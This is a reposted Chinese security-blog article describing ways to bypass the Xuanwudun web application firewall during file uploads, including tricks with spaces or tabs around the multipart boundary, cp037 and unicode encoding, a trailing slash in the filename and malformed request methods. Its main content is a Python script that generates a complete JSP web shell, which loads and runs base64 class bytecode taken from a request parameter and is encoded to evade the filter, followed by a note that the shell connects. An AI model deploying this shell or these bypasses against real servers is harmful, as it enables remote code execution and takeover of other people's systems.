【转载】玄武盾的几种绕过姿势

admin
admin
admin
139230
文章
114
评论
2022年8月15日21:02:34评论98 views字数 1505阅读5分1秒阅读模式

文件名绕过

boundary等号前后空格绕过

Content-Type: multipart/form-data;
boundary = ----WebKitFormBoundaryMJPuN1aHyzfAO2m3

【转载】玄武盾的几种绕过姿势

boundary等号前后ascii码09绕过

【转载】玄武盾的几种绕过姿势

Cp037编码绕过

【转载】玄武盾的几种绕过姿势

文件名后加/绕过

【转载】玄武盾的几种绕过姿势

畸形请求方法

【转载】玄武盾的几种绕过姿势

文件内容绕过

unicode编码

【转载】玄武盾的几种绕过姿势

cp037编码(脚本内置马支持后缀jsp/jspx,都可解析)

编码脚本

#python2data = '''<?xml version="1.0" encoding="cp037"?><jsp:root xmlns:jsp="http://java.sun.com/JSP/Page" version="1.2">  <jsp:declaration>    class PERFORM extends ClassLoader {      PERFORM(ClassLoader c) { super(c);}      public Class bookkeeping(byte[] b) {        return super.defineClass(b, 0, b.length);      }    }    public byte[] branch(String str) throws Exception {      Class base64;      byte[] value = null;      try {        base64=Class.forName("sun.misc.BASE64Decoder");        Object decoder = base64.newInstance();        value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] {String.class }).invoke(decoder, new Object[] { str });      } catch (Exception e) {        try {          base64=Class.forName("java.util.Base64");          Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);          value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { str });        } catch (Exception ee) {}      }      return value;    }  </jsp:declaration>  <jsp:scriptlet>    String cls = request.getParameter("xxoo");    if (cls != null) {      new PERFORM(this.getClass().getClassLoader()).bookkeeping(branch(cls)).newInstance().equals(new Object[]{request,response});    }  </jsp:scriptlet></jsp:root>'''fcp037 = open('cp037.jsp','wb')![](https://xzfile.aliyuncs.com/media/upload/picture/20220804173607-de2cfbb4-13d8-1.png)fcp037.write(data.encode('cp037'))

生成出来,burp选择paste from file

【转载】玄武盾的几种绕过姿势

【转载】玄武盾的几种绕过姿势

【转载】玄武盾的几种绕过姿势

可以正常连接

【转载】玄武盾的几种绕过姿势

文章来源:https://xz.aliyun.com/t/11607


原文始发于微信公众号(听雨安全):【转载】玄武盾的几种绕过姿势

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月15日21:02:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【转载】玄武盾的几种绕过姿势http://cn-sec.com/archives/1236550.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息